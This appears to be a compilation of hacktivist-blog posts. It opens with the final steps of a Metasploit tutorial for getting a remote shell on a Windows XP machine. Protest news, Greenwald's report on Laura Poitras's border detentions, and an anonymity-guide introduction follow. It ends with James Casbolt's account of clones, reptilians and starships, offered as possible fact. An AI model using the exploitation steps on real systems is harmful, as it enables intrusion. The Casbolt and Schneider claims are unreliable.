msf > set LHOST 10.0.0.6

 

Step 9 Exploit

Now we command Metasploit to exploit the system:

msf > exploit

Step 10 Open a Shell on the Hacked System

Type the command –I 1 to open a command shell on the XP system that will appear on your Metasploit console.

–I 1

To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!

C: >dir

Congratulations! You have just hacked your first system using Metasploit!

In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful Meterpreter, Metasploit’s proprietary payload.

Read more: http://null-byte.wonderhowto.com/blog/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/#ixzz1t2aFUR2x

Source: http://www.businessinsider.com/hack-like-a-pro-how-to-exploit-and-gain-remote-access-to-pcs-running-windows-xp-2012-4

War Veterans Protest, Throw Their Medals Back, at NATO Summit

War Veterans Protest, Throw Their Medals Back, at NATO Summit

http://youtu.be/0B-CEdMmwJ4

CHICAGO (Reuters) – Nearly 50 U.S. military veterans at an anti-NATO rally in Chicago threw their service medals into the street on Sunday, an action they said symbolized their rejection of the U.S.-led wars in Iraq and Afghanistan.

Some of the veterans, many wearing military uniform shirts over black anti-war t-shirts, choked back tears as they explained their actions. Others folded an American flag while a bugle played “Taps,” which is typically performed at U.S. military funerals.

“The medals are supposed to be for acts of heroism. I don’t feel like a hero. I don’t feel like I deserve them,” said Zach LaPorte, who served in Iraq in 2005 and 2006.

LaPorte, a 28-year-old mechanical engineer from Milwaukee, said he enlisted in the Army at 19 because he felt there were few other options. At the time, he could not afford to stay in college.

“I witnessed civilian casualties and civilians being arrested in what I consider an illegal occupation of a sovereign nation,” LaPorte said.

He said he was glad the United States had withdrawn its combat troops from Iraq, but said he did not believe the NATO military alliance was going to leave Afghanistan.

On Sunday, NATO Secretary-General Anders Fogh Rasmussen opened the two-day summit of the 26-member alliance saying there would be no hasty exit from Afghanistan.

A veteran from New York who only gave his name as Jerry said: “I don’t want any part of this anymore. I chose human life over war, militarism and imperialism.”

The veterans had hoped to present their medals to a NATO representative. The closest they could get was the fence ringing the McCormick Place convention center about a block from where U.S. President Barack Obama and other leaders were meeting. The veterans threw their medals toward the convention center.

Matt Howard, 29, who served in the Marines from 2001 to 2006, said the rate of suicides among veterans returning from the wars is high.

“These medals are not worth the cloth and steel they’re printed on. They’re representative of failed policies,” said Howard, a spokesman for Iraq Veterans Against the War.

Former U.S. Army Sergeant Alejandro Villatoro, 29, of Chicago, served during the Iraq 2003 invasion and in Afghanistan in 2011.

He said he suffers from post-traumatic stress syndrome and depression and gave back three medals – one “War on Terrorism” medal, one for participating in the Iraq war and a NATO medal from the Afghanistan war. He said he wants the war in Afghanistan to end.

“There’s no honor in these wars,” said Villatoro, before he threw away his medals. “There’s just shame.”

(Editing by Greg McCune and Stacey Joyce)

SOURCE: http://mobile.reuters.com/article/idUSBRE84J0D520120520?irpc=932

 

Occupy Monsanto Poland Dumps Thousands of Dead Bees in Protest

Occupy Monsanto Poland Dumps Thousands of Dead Bees in Protest

On March 15, over 1,500 beekeepers and anti-GMO protesters marched through the streets of Warsaw, depositing thousands of dead bees on the steps of the Ministry of Agriculture in protest of genetically modified foods and their pesticides which are together largely responsible for the killing off of bees, butterflies, moths and other beneficial pollinators in great numbers.

Later that day the Minister of Agriculture, Marek Sawicki, announced plans to ban MON810, which has already produced millions of hectares of pesticide resistant “superweeds” in the US.

The Polish Beekeepers Association organized the protest, joining forces with International Coalition to Protect the Polish Countryside (ICPPC) and the Coalition for a GMO Free Poland.  Targeting Monsanto’s MON810 GM corn in particular, they also called for a complete ban on all genetically engineered crops as well as the pesticides found to be most damaging to the environment (and particularly to bees).

In 2008, the Polish Parliament banned GM feed, including both the planting and importing of GM crops. “Despite this progressive step,” reports Food Travels, “the European Commission has refused to accept regional bans on GMOs, keeping Polish farmers, producers, and activists on the offensive.”

Regardless, says the ICPPC, “None of the nine European Union countries that have already prohibited MON 810 did so by asking the permission of the EU.”

There was a great variety of attire as beekeepers dressed in their work bee suits and masks and ran their hive smoke guns as they marched, many wore yellow jackets with the famous Einstein quote, and many more original signs, props, and costumes.  Go here for more photos.

The ICPPC is asking Polish residents to write Minister of Agriculture Marek Sawicki, demanding that he implement an immediate moratorium on GM crops, without waiting for EU approval.

 

SOURCE:
http://anonymissexpress.cyberguerrilla.org/?p=2762

By: FoodFreedom, March 25, 2012

FBI Escalates War On Anonymous

FBI Escalates War On Anonymous

The Feds raid the home of unofficial Anonymous spokesperson Barrett Brown.

They’re after his Twitter records, chat logs, IRC conversations, his computer, and apparently everything else, according to the search warrant obtained by BuzzFeed.

Last month, the FBI raided the Dallas home of Barrett Brown, the journalist and unofficial spokesperson for the Internet hacktivist group Anonymous.

According to the search warrant, the agents were after any information from Brown involving a “conspiracy to access without authorization computers,” one of three serious charges listed in the document.

The Feds seized Brown’s computer and cellphone, searched his parent’s home as well, and demanded his Twitter records, chat logs, IRC conversations, Pastebin info, all his Internet browsing activity, and almost any form of electronic communications Brown conducted.

The warrant, exclusively obtained by BuzzFeed, suggests the government is primarily after information related to Anonymous and the hacking group Lulzec.

The authorities also appear to be interested in info on two private intelligence contracting firms, HBGary and EndGame Systems, two companies Brown has frequently clashed with and criticized on a website he founded called Echelon2.

Brown, a 30 year old journalist who has written for Vanity Fair and the Guardian, is perhaps the most high profile target thus far in the FBI’s investigation into a series of hacks that have shaken the corporate and defense establishment.

Brown, currently at work on a book about Anonymous, believes he’s being wrongly investigated. “I haven’t been charged with anything at this point, although there’s a sealed affidavit to which neither I nor my attorney have access,” he emailed BuzzFeed. “I suspect that the FBI is working off of incorrect information.”

His full statement can be read here.

 

posted 

Michael Hastings | BuzzFeed Staff

Source: http://www.buzzfeed.com/mhastings/exclusive-fbi-escalates-war-on-anonymous

Excessive Harrassment: U.S. ‘Activist’ filmmaker Rrepeatedly Detained At Border

Excessive Harrassment: U.S. ‘Activist’ filmmaker Rrepeatedly Detained At Border

One of the more extreme government abuses of the post-9/11 era targets U.S. citizens re-entering their own country, and it has received far too little attention. With no oversight or legal framework whatsoever, the Department of Homeland Security routinely singles out individuals who are suspected of no crimes, detains them and questions them at the airport, often for hours, when they return to the U.S. after an international trip, and then copies and even seizes their electronic devices (laptops, cameras, cellphones) and other papers (notebooks, journals, credit card receipts), forever storing their contents in government files. No search warrant is needed for any of this. No oversight exists. And there are no apparent constraints on what the U.S. Government can do with regard to whom it decides to target or why.

In an age of international travel — where large numbers of citizens, especially those involved in sensitive journalism and activism, frequently travel outside the country — this power renders the protections of the Fourth Amendment entirely illusory. By virtue of that amendment, if the government wants to search and seize the papers and effects of someone on U.S. soil, it must (with some exceptions) first convince a court that there is probable cause to believe that the objects to be searched relate to criminal activity and a search warrant must be obtained. But now, none of those obstacles — ones at the very heart of the design of the Constitution — hinders the U.S. government: now, they can just wait until you leave the country, and then, at will, search, seize and copy all of your electronic files on your return. That includes your emails, the websites you’ve visited, the online conversations you’ve had, the identities of those with whom you’ve communicated, your cell phone contacts, your credit card receipts, film you’ve taken, drafts of documents you’re writing, and anything else that you store electronically: which, these days, when it comes to privacy, means basically everything of worth.

This government abuse has received some recent attention in the context of WikiLeaks. Over the past couple of years, any American remotely associated with that group — or even those who have advocated on behalf of Bradley Manning — have been detained at the airport and had their laptops, cellphones and cameras seized: sometimes for months, sometimes forever. But this practice usually targets people having nothing to do with WikiLeaks.

2011 FOIA request from the ACLU revealed that just in the 18-month period beginning October 1, 2008, more than 6,600 people — roughly half of whom were American citizens — were subjected to electronic device searches at the border by DHS, all without a search warrant. Typifying the target of these invasive searches is Pascal Abidor, a 26-year-old dual French-American citizen and an Islamic Studies Ph.D. student who was traveling from Montreal to New York on an Amtrak train in 2011 when he was stopped at the border, questioned by DHS agents, handcuffed, taken off the train and kept in a holding cell for several hours before being released without charges; those DHS agents seized his laptop and returned it 11 days later when, the ACLU explains, “there was evidence that many of his personal files, including research, photos and chats with his girlfriend, had been searched.” That’s just one case of thousands, all without any oversight, transparency, legal checks, or any demonstration of wrongdoing.

* * * * *

But the case of Laura Poitras, an Oscar-and Emmy-nominated filmmaker and intrepid journalist, is perhaps the most extreme. In 2004 and 2005, Poitras spent many months in Iraq filming a documentary that, as The New York Times put it in its review, “exposed the emotional toll of occupation on Iraqis and American soldiers alike.” The film, “My Country, My Country,” focused on a Sunni physician and 2005 candidate for the Iraqi Congress as he did things like protest the imprisonment of a 9-year-old boy by the U.S. military. At the time Poitras made this film, Iraqi Sunnis formed the core of the anti-American insurgency and she spent substantial time filming and reporting on the epicenter of that resistance. Poitras’ film was released in 2006 and nominated for the 2007 Academy Award for Best Documentary.

In 2010, she produced and directed “The Oath,” which chronicled the lives of two Yemenis caught up in America’s War on Terror: Salim Hamdan, the accused driver of Osama bin Laden whose years-long imprisonment at Guantanamo led to the 2006 Supreme Court case, bearing his name, that declared military commissions to be a violation of domestic and international law; and Hamdan’s brother-in-law, a former bin Laden bodyguard. The film provides incredible insight into the mindset of these two Yemenis. TheNYT feature on “The Oath” stated that, along with “My Country, My Country,” Poitras has produced ”two of the most searching documentaries of the post-9/11 era, on-the-ground chronicles that are sensitive to both the political and the human consequences of American foreign policy.” At the 2010 Sundance film festival, “The Oath” won the award for Best Cinematography.

Poitras’ intent all along with these two documentaries was to produce a trilogy of War on Terror films, and she is currently at work on the third installment. As Poitras described it to me, this next film will examine the way in which The War on Terror has been imported onto U.S. soil, with a focus on the U.S. Government’s increasing powers of domestic surveillance, its expanding covert domestic NSA activities (includingconstruction of a massive new NSA facility in Bluffdale, Utah), its attacks on whistleblowers, and the movement to foster government transparency and to safeguard Internet anonymity. In sum, Poitras produces some of the best, bravest and most important filmmaking and journalism of the past decade, often exposing truths that are adverse to U.S. government policy, concerning the most sensitive and consequential matters (a 2004 film she produced for PBS on gentrification of an Ohio town won the Peabody Award and was nominated for an Emmy).

But Poitras’ work has been hampered, and continues to be hampered, by the constant harassment, invasive searches, and intimidation tactics to which she is routinely subjected whenever she re-enters her own country. Since the 2006 release of “My Country, My Country,” Poitras has left and re-entered the U.S. roughly 40 times. Virtually every timeduring that six-year-period that she has returned to the U.S., her plane has been met by DHS agents who stand at the airplane door or tarmac and inspect the passports of every de-planing passenger until they find her (on the handful of occasions where they did not meet her at the plane, agents were called when she arrived at immigration). Each time, they detain her, and then interrogate her at length about where she went and with whom she met or spoke. They have exhibited a particular interest in finding out for whom she works.

She has had her laptop, camera and cellphone seized, and not returned for weeks, with the contents presumably copied. On several occasions, her reporter’s notebooks were seized and their contents copied, even as she objected that doing so would invade her journalist-source relationship. Her credit cards and receipts have been copied on numerous occasions. In many instances, DHS agents also detain and interrogate her in the foreign airport before her return, on one trip telling her that she would be barred from boarding her flight back home, only to let her board at the last minute. When she arrived at JFK Airport on Thanksgiving weekend of 2010, she was told by one DHS agent — after she asserted her privileges as a journalist to refuse to answer questions about the individuals with whom she met on her trip — that he “finds it very suspicious that you’re not willing to help your country by answering our questions.” They sometimes keep her detained for three to four hours (all while telling her that she will be released more quickly if she answers all their questions and consents to full searches).

Poitras is now forced to take extreme steps — ones that hamper her ability to do her work — to ensure that she can engage in her journalism and produce her films without the U.S. Government intruding into everything she is doing. She now avoids traveling with any electronic devices. She uses alternative methods to deliver the most sensitive parts of her work — raw film and interview notes — to secure locations. She spends substantial time and resources protecting her computers with encryption and password defenses. Especially when she is in the U.S., she avoids talking on the phone about her work, particularly to sources. And she simply will not edit her films at her home out of fear — obviously well-grounded — that government agents will attempt to search and seize the raw footage.

That’s the climate of fear created by the U.S. Government for an incredibly accomplished journalist and filmmaker who has never been accused, let alone convicted, of any wrongdoing whatsoever. Indeed,documents obtained from a FOIA request show that DHS has repeatedly concluded that nothing incriminating was found from its border searches and interrogations of Poitras. Nonetheless, these abuses not only continue, but escalate, after six years of constant harassment.

* * * * *

Poitras has been somewhat reluctant to speak publicly about the treatment to which she is subjected for fear that doing so would further impede her ability to do her work (the NYT feature on “The Oath” included some discussion of it). But the latest episode, among the most aggressive yet, has caused her to want to vociferously object.

On Thursday night, Poitras arrived at Newark International Airport from Britain. Prior to issuing her a boarding pass in London, the ticket agent called a Customs and Border Patrol (CBP) agent (Yost) who questioned her about whom she met and what she did. Upon arriving in Newark, DHS/CBP agents, as always, met her plane, detained her, and took her to an interrogation room. Each time this has happened in the past, Poitras has taken notes during the entire process: in order to chronicle what is being done to her, document the journalistic privileges she asserts and her express lack of consent, obtain the names of the agents involved, and just generally to cling to some level of agency.

This time, however, she was told by multiple CBP agents that she was prohibited from taking notes on the ground that her pen could be used as a weapon. After she advised them that she was a journalist and that her lawyer had advised her to keep notes of her interrogations, one of them, CBP agent Wassum, threatened to handcuff her if she did not immediately stop taking notes. A CBP Deputy Chief (Lopez) also told her she was barred from taking notes, and then accused her of “refusing to cooperate with an investigation” if she continued to refuse to answer their questions (he later clarified that there was no “investigation” per se, but only a “questioning”). Requests for comment from the CBP were not returned as of the time of publication.

Just consider the cumulative effect of this six years of harrassment and invasion. Poitras told me that it is “very traumatizing to come home to your own country and have to go through this every time,”and described the detentions, interrogations and threats as “infuriating,” “horrible” and “intimidating.” She told me that she now “hates to travel” and avoids international travel unless it is absolutely necessary for her work. And as she pointed out, she is generally more protected than most people subjected to similar treatment by virtue of the fact that she is a known journalist with both knowledge of her rights and the ability to publicize what is done to her. Most others are far less able to resist these sorts of abuses. But even for someone in Poitras’ position, this continuous unchecked government invasion is chilling in both senses of the word: it’s intimidating in its own right, and deters journalists and others from challenging government conduct.

* * * * *

As is true for so many abuses of the Surveillance State and assaults on basic liberties in the post-9/11 era, federal courts have almost completely abdicated their responsibility to serve as a check on these transgressions. Instead, federal judges have repeatedly endorsed the notion that the U.S. Government can engage in the most invasive border searches of citizens, including seizures and copying of laptops, without any reasonable suspicion of wrongdoing whatsoever, let alone probable cause.

That has happened in part because federal courts have become extremely submissive to assertions of Executive authority in the post-9/11 era, particularly when justified in the name of security. It’s also in part because anyone with a record of anti-authoritarianism or a willingness to oppose unrestrained government power, with very rare exception, can no longer get appointed to the federal bench; instead, it’s an increasingly homogeneous lot with demonstrated fealty to institutional authority. And it’s also in part because many life-tenured federal judges have been cloistered on the bench for decades, are technologically illiterate, and thus cannot apprehend the basic difference between having your suitcase searched at the airport and having the contents of your laptop and cellphone copied and stored by the U.S. Government.

One potentially important and encouraging exception to this trend was a ruling two weeks ago by U.S. District Judge Denise Casper, an Obama-appointed judge in the District of Massachusetts. As I’ve reported previously, David House, an activist who helped found the Bradley Manning Support Network, was detained by DHS when returning from a vacation in Mexico and had all of his electronic devices, including his laptop, seized; those devices were returned to him after almost two months only after he retained the ACLU of Massachusetts to demand their return. The ACLU then represented him in a lawsuit he commenced against the U.S. Government, alleging that his First and Fourth Amendment rights were violated by virtue of being targeted for his political speech and advocacy.

The DOJ demanded dismissal of the lawsuit, citing the cases approving of its power to search without suspicion, and also claimed that House was targeted not because of his political views but because of his connection to the criminal investigation of Manning and WikiLeaks. But the court refused to dismiss House’s lawsuit, holding that if he were indeed targeted by virtue of his protected activities, then his Constitutional rights have been violated:

Before even questioning House, the agents seized his electronic devices and in seizing them for forty-nine days, reviewed, retained, copied and disseminated information about the Support Network. Although the agents may not need to have any particularized suspicion for the initial search and seizure at the border for the purpose of the Fourth Amendment analysis, it does not necessarily follow that the agents, as is alleged in the complaint, may seize personal electronic devices containing expressive materials, target someone for their political association and seize his electronic devices and review the information pertinent to that association and its members and supporters simply because the initial search occurred at the border. . . 

When agents Santiago and Louck stopped House while he was en route to his connecting flight, they directed him to surrender the electronic devices he was carrying. They questioned him for an extended period of time only after seizing his devices. When the agents questioned House, they did not ask him any questions related to border control, customs, trade, immigration, or terrorism and did not suggest that House had broken the law or that his computer may contain illegal material or contraband. Rather, their questions focused solely on his association with Manning, his work for the Support Network, whether he had any connections to WikiLeaks, and whether he had contact with anyone from WikiLeaks during his trip to Mexico. Thus, the complaint alleges that House was not randomly stopped at the border; it alleges that he was stopped and questioned solely to examine the contents of his laptop that contained expressive material and investigate his association with the Support Network and Manning. . . .

That the initial search and seizure occurred at the border does not strip House of his First Amendment rights, particularly given the allegations in the complaint that he was targeted specifically because of his association with the Support Network and the search of his laptop resulted in the disclosure of the organizations, members, supporters donors as well as internal organization communications that House alleges will deter further participation in and support of the organization. Accordingly, the Defendants’ motion to dismiss House’s First Amendment claim is DENIED. [emphasis added]

As Kevin Gosztola notes in an excellent report on this ruling, the court — although it dubiously found that “the search of House’s laptop and electronic devices is more akin to the search of a suitcase and other closed containers holding personal information travelers carry with them when they cross the border which may be routinely inspected by customs and require no particularized suspicion” – also ruled that the length of time DHS retained House’s laptop (six weeks) may render the search and seizure unreasonable in violation of the Fourth Amendment.

But thus far, very few efforts have been made to restrain this growing government power. More than a year ago, Democratic Rep. Loretta Sanchez described to me legislation she proposed just to impose someminimal rules and safeguards governing what DHS can do at the airport, but it’s gone nowhere. A much stronger bill, proposed by then-Sen. Feingold, would have barred laptop seizures entirely without a search warrant, but it suffered the same fate. Apparently, the Small Government faction calling itself the “Tea Party” has no greater interest in restraining this incredibly invasive government power than the Democratic Party which loves to boast of its commitment to individual rights.

It’s hard to overstate how oppressive it is for the U.S. Government to be able to target journalists, film-makers and activists and, without a shred of suspicion of wrongdoing, learn the most private and intimate details about them and their work: with whom they’re communicating, what is being said, what they’re reading. That’s a radical power for a government to assert in general. When it starts being applied not randomly, but to people engaged in activism and journalism adverse to the government, it becomes worse than radical: it’s the power of intimidation and deterrence against those who would challenge government conduct in any way. The ongoing, and escalating, treatment of Laura Poitras is a testament to how severe that abuse is.

If you’re not somebody who films the devastation wrought by the U.S. on the countries it attacks, or provides insight into Iraqi occupation opponents and bin Laden loyalists in Yemen, or documents expanding NSA activities on U.S. soil, then perhaps you’re unlikely to be subjected to such abuses and therefore perhaps unlikely to care much. As is true for all states that expand and abuse their own powers, that’s what the U.S. Government counts on: that it is sending the message that none of this will affect you as long as you avoid posing any meaningful challenges to what they do. In other words: you can avoid being targeted if you passively acquiesce to what they do and refrain from interfering in it. That’s precisely what makes it so pernicious, and why it’s so imperative to find a way to rein it in.

SOURCE:
http://www.salon.com/2012/04/08/u_s_filmmaker_repeatedly_detained_at_border/singleton/

By: Glenn Greenwald, April 8, 2012

The Underground – A Hidden Reality and The True Story of Phil Schneider

The Underground – A Hidden Reality and The True Story of Phil Schneider

http://www.youtube.com/watch?v=XzWGsO0F3b8

Phil Schneider died in 1996. Previous to his death he had been on tour across the United States speaking out about various subjects including his involvement with building a secret underground base in Dulce, New Mexico for the military. During this time, he said to have had an encounter with a violent E.T race in the late 1970’s which would change his whole world reality immediately after. This documentary explores some of the information Phil Schneider spoke about to the public in the 1990’s by examining each claim in detail with expert opinions from Richard Dolan, Richard Sauder, Neil Gould and Cynthia Drayer (Phil’s Ex-Wife).

In this documentary you will find never before published photo’s of Phil’s Autopsy, documents about the Philadelphia Experiment from Oscar Schneider’s files (Phil’s father) and a very well explained background about Underground Bases.

“Interviews conducted by Darcy Weir”
“Edited by Darcy Weir”
“Music by Lee Lustig” www.leelustig.bandcamp.com

How to secure your computer and surf fully Anonymous BLACK-HAT STYLE

How to secure your computer and surf fully Anonymous BLACK-HAT STYLE

This is a guide with which even a total noob can get high class security for his system and complete anonymity online. But its not only for noobs, it contains a lot of tips most people will find pretty helpfull. It is explained so detailed even the biggest noobs can do it^^ :

=== The Ultimate Guide for Anonymous and Secure Internet Usage v1.0.1 ===

Table of Contents:

  1.   Obtaining Tor Browser
  2.   Using and Testing Tor Browser for the first time
  3.   Securing Your Hard Drive
  4.   Setting up TrueCrypt, Encrypted Hidden Volumes
  5.   Testing TrueCrypt Volumes
  6.   Securing your Hard Disk
  7.   Temporarily Securing Your Disk, Shredding Free Space
  8.   Installing VirtualBox
  9.   Installing a Firewall
  10.   Firewall Configuration
  11.   Installing Ubuntu
  12.   Ubuntu Initial Setup
  13.   Installing Guest Additions
  14.   Installing IRC (Optional)
  15.   Installing Torchat (Optional)
  16.   Creating TOR-Only Internet Environment
  17.   General Daily Usage

By the time you are finished reading and implementing this guide, you will be able to securely and anonymously browse any website and to do so anonymously. No one not even your ISP or a government agent will be able to see what you are doing online. If privacy and anonymity is important to you, then you owe it to yourself to follow the instructions that are presented here.

In order to prepare this guide for you, I have used a computer that is running Windows Vista. This guide will work equally well for other versions of Windows. If you use a different operating system, you may need to have someone fluent in that operating system guide you through this process. However, most parts of the process are easily duplicated in other operating systems.

I have written this guide to be as newbie friendly as possible. Every step is fully detailed and explained. I have tried to keep instructions explicit as possible. This way, so long as you patiently follow each step, you will be just fine.

In this guide from time to time you will be instructed to go to certain URLs to download files. You do NOT need TOR to get these files, and using TOR (while possible) will make these downloads very slow.

This guide may appear overwhelming. Every single step is explained thoroughly and it is just a matter of following along until you are done. Once you are finished, you will have a very secure setup and it will be well worth the effort. Even though the guide appears huge, this whole process should take at the most a few hours. You can finish it in phases over the course of several days.

It is highly recommended that you close *ALL* applications running on your computer before starting.

SOURCE:
http://www.cyberguerrilla.org/?p=3322

NSA Wistleblower James Casbolt Part Two: Project IBIS

NSA Wistleblower James Casbolt Part Two: Project IBIS

What follows was sent to me by Michael Prince aka James Casbolt. I cannot confirm or substantiate this information at this time but publish it with the proviso to let the viewer decide…

Kerry Lynn Cassidy
Project Camelot

Janary 29, 2012

SECTION TWO
Life Extension- The Chronicles of Michael Prince
by James Michael Casbolt
1992 Sirius Sector
I am not fully conscious at this time when I’m physically on this planet. Part of my consciousness is trapped within a quantum computer system on board my space vessel named the USS CALOPIA. This vessel orbits whatever planet I’m on at the time. This vessel is a UN/US Space Command vessel. The technology on board actually causes the vessel to physically follow me around the galaxy using stargates to travel vast distances. During the compartmentalizing torture sessions at the Hive in South Africa and the London underground facility, my consciousness has been leaving my body and entering a physical cloned body in vat stasis on board the USS Calopia.

The computer system on board this vessel monitors the vital signs of these cloned copies of my body. When life signs are detected within the cloning vat, the computer system sends mechanical servitors to take me to a an emergency medical bay until I am physically recovered and can walk around the ship in a stable condition. My physical body down on the planet during these times is always inhabited by my MIRROR ENTITY. At the breaking point of maximum pain levels… when I ‘pass-out’ my consciousness leaves my physical body in the underground base or wherever and wakes up in the cloned body on board the USS Calopia. When I recover and leave the medical bay on the Calopia, I always enter a specific room where I can monitor my physical body down on the planet. I can also monitor the vital life signs of the body on the planet. This process involves looking through physical cybernetic implants within the eyes. I am also able to operate the computer system on board the ship and bounce the signal off walls to look at the body from a remote location as well viewing through the eyes.

There is always a time limit that the Mirror Entity can take possession of my body down on the planet. The computer system on board the USS Calopia will always give me a warning five minutes before the Mirror Entity departs my body. This physical body will then shapeshift back into a human form when my consciousness enters back into it. The computer system flashes symbols on one of the screens at this time and a digital voice will say-
“Five minutes to genetic molecule alignment”

At this point I will walk out of this particular room on board the ship and enter a room down the corridor to the right hand side. In this room a vertical body pod called a ‘Ventricle Duct’ is positioned at the far end of the room. I will step into the pod with my back facing the wall. A plastic screen will close in front of me and the pod will tip back slightly. The pod will then fill up with liquid that I can breath and I will slowly and gently fall asleep and wake up again in my body down on the planet. This technology assists me in dealing with intense/prolonged pain and terror.

However at this time in 1992 I do not have conscious control over all the technology on board the USS Calopia. I also have a slightly schizophrenic relationship with the computer on board the vessel. At times of acute distress the computer and I talk back and forth. I.E- at the time I was ‘drowned’ in the ‘well’ at the Sirius prison facility, at the moment of greatest terror for me, I heard the computer system on board the USS Calopia inside my head, saying something like-“Regulation 301- Assist in binary xxxx ( numbers I can’t remember ) teleportation? Assist in binary xxxx teleportation?”

The ‘Assist in binary teleportation’ would be repeated with an increased sense of urgency tone of urgency until I felt like my lungs were going to explode. Just at the point of lung rupture taking place, I saw the Kabballa formation in my mind’s eye. I had a split second to choose between two of circles lit up. One green in colour, the other red in colour.

Green= I leave my body ( less risk )
Red= I stay in my body ( more risk )

I choose red at this time, stay in my body and I actually start to breath underwater through some kind of cybernetic breathing mechanism inside my body initiating at this time. The ultimate goal is to stay in the body and gain fully conscious control over all the technology on board the USS Calopia. Some of the hardware and software on board is ancient. Basically I need to switch the AI section of the computer on board off. At this time my brain will become ‘quiet’ and the internal dialogue that takes place inside my head between myself and the computer, will stop.-The scepter artifact I was handed by the ‘Jesuit/Reptilian’ priests after the drowning was a missing piece from the computer on board my ship. I was able to stay in my body during the drowning and therefore realize my physically indestructible nature. However the artifact was ultimately placed within a container inside the Emerald Room at this time, with the female and male reptilians inside. Because of this the female and male reptilians in the Emerald Room own a piece of my mind at this time in 1992.

Now because I was able to resist teleporting my consciousness onto the USS Calopia during a time of intense stress, I have moved one step closer to mastering this technology. Now at times of intense stress when the internal communication between myself and the computer system on the Calopia starts, I can instruct the whole vessel to physically teleport near to my location and send mechanical servitors into the place where I am distressed and physically rescue me. This way I end up physically on board the USS Calopia without having to leave my body. The trick to mastering all this technology is to stay in one physical body and not ‘body hop’ from one physical container to another.

Eventually the objective was to liberate this artifact from the Emerald Room and return it back to my ship. When events such as this happen, in times of danger, there will be no internal dialogue between myself and the computer on the Calopia. The artifact will be physically teleported to me from the ship and I will have complete mastery of my environment enabling me to come out of any dangerous situation safely. I can say at this time, I have claimed the artifact from the two reptilians and I have complete control over the Emerald Room they occupied in the past. I am approaching a state where I will actually be able to incorporate the artifact into my cybernetic body. At that time I will not have to wait for the time delay while the device is teleported from the USS Calopia to me. I will not have to rely on the USS Calopia at all and will have full conscious control over the technology. It is not a matter of if this happens but a matter of when.

1992- D4 facility- Sirius Sector

A door opens at the back of the Emerald Room. I exit the Emerald Room with the male and female reptilians in it and walk into a corridor. I am met by two human guards and I instinctively walk down the corridor behind them. Doors are located on either side of the corridor and some are open as I walk past them. I glance into a room on the left and see tall grey types working on some kind of crystal based computers. I glance to the right as I’m walking and see larger rooms with short grey types working on larger computers with conveyer belt type apparatus at the back of the rooms. I see box shaped objects on the conveyer belts and parts of exo-skeleton robotics such as mechanical arms and such.
A pair of tall grey overseers exits one of the rooms on the right and follow behind me. One of the greys creates a telepathic link between itself to the back of my head and a data exchange starts to take place as we walk. I see the layout and design on the whole facility.

The place is designed exactly like the Pentagon building in Virginia. This Sirius facility has five ring corridors within each other ( pentagons within pentagons ). Each of the five sections houses a separate extra-terrestrial race. Prisoners considered most dangerous by the ruling elite of each race work with scientists of the same race during their incarceration periods. This facility rests on a flat terra-formed seabed under the ocean of this planet to prevent escape. The facility is considered impossible to escape from as previously mentioned. The whole facility is able to detach itself from the seabed in times of emergency, emerge from the water and become airbourne/spacebourne.

The five types of lifeforms in each section of this facility are as follows:
5th Outer Ring- ‘Cat-People’ Bipedal cat type creatures based all over the galaxy but high numbers of these beings located in Sirius Star Sector.
4th Inner Ring- ‘Bird-People’ Bipedal bird type creatures based all over the galaxy but high numbers located in Orion and Draco Star Sectors.
3rd Inner Ring – ‘Wolf-People’ Bipedal canine type creatures based all over the galaxy but high numbers in Sirius Star Sector.
2nd Inner Ring- Humans.

1st Inner Ring- ‘Reptile-People’ Bipedal reptile type creatures based all over the galaxy but high numbers in Draco and Sirius Star Sector ( classic reptilian and grey types ).
A large space exists within the centre of the facility similar to the Pentagon building in Virginia but in the centre of this building is a huge five sided pyramid structure that protrudes out the top. Some type of antenna/teleportation device is located in the direct centre of the five sided pyramid. The data download continues to happen as we walk further down the corridor and I see that this reptilian section of the facility operates in a type of factory setting and the beings within operate in a very collective fashion. The entire facility operates in this way but it is most extreme here. I also see that ultimately the entire facility is run by AI at this time, which oversees most of the activity within the facility.

I see that the AI has been extensively involved in cognitive behaviour tests here. This has been to determine which of the five base races has the highest survival dynamic. These ‘survival of the fittest’ AI tests has been carried out separately on each race. The AI computer system has then mixed the races together in general population on several occasions. The strongest of each race have then been housed together for a continuation of these tests. Where I am being led now is part of the final series of testing in this area.
We continue to walk down and corridor and enter a lift at the end. All five of us get in and descend. The elevator doors open into an absolutely massive room with five walkways converging in the centre. The room is quite dark and very silent. I look up and see the huge five-sided pyramid structure above me built with a type of dark glass. We walk along our walkway towards the centre of the structure. It takes a long time and with every step I feel an awesome power building in my body. After walking for awhile I see on object in the distance. As we get closer I see a familiar trip seat type device. We get to the device and I get in the seat while the two human guards strap me into the chair.

Once this is complete, the two human guards and two greys walk away back in the direction of the lift. I sit in the dark silent massive room for a awhile and wait. I feel completely calm. I hear loud mechanical rumblings around me and five massive square mirrors extend out of the ground to form a pentagon shaped prism around me. My form sitting in the seat is reflected around me in many strange ways. My reflection seems to go on forever. I then see five faces appear on each mirror. They seem to be reflected backwards to how the facility is set-up I.E- A massive reptile face appears in this gigantic mirror to my left, the seat then rotates to the right and I see a huge wolf face, rotate to the right again and I see a huge bird-face, rotate right again I see a huge cat-face. The chair rotates slowly again and I see a huge human face. The face is Commander Sarion who may be my father. The chair then rotates to its original position and sinks into the floor where mechanical locks clamp the chair into a more secure position.

The chair starts to spin in a clockwise motion and gets faster and faster with each rotation. The faces appear to start laughing and as the rotation speed quickens, they all start to blend into one in my vision. I hear a crackling electrical sound and bright white light is coming from the centre of the pyramid down into my body. I start to convulse and I feel myself being filled with massive power and my muscles and joints tearing, stretching and ripping. This is massive pleasure and pain combined and feels like a huge orgasm. I feel my body expanding and when I feel myself reaching a climatic power point, the dark room around me disappears and I find myself standing in some desert canyon. My whole body is tingling with energy and feels very different.

Sirius 1992 continued

As the crackling energy envelops me in the chair, a time delay occurs just before I am teleported off planet into the canyon. I arrive in a tube on board the Calopia and look out through the clear partition as servitor droids come to collect me. The door in the tube opens and I fall forward in a weakened state into the mechanical arms of two servitors.

They lift me onto a hovering gurney and follow by my side on their wheeled legs as I am moved through the corridor on the right side of the vessel leading towards the recovery bay. Large viewing windows are positioned on the right side and I look down at the blue planet below. Most of the mass is covered by a huge ocean and I see a small land mass off to the left lit up by the huge sun behind the planet.

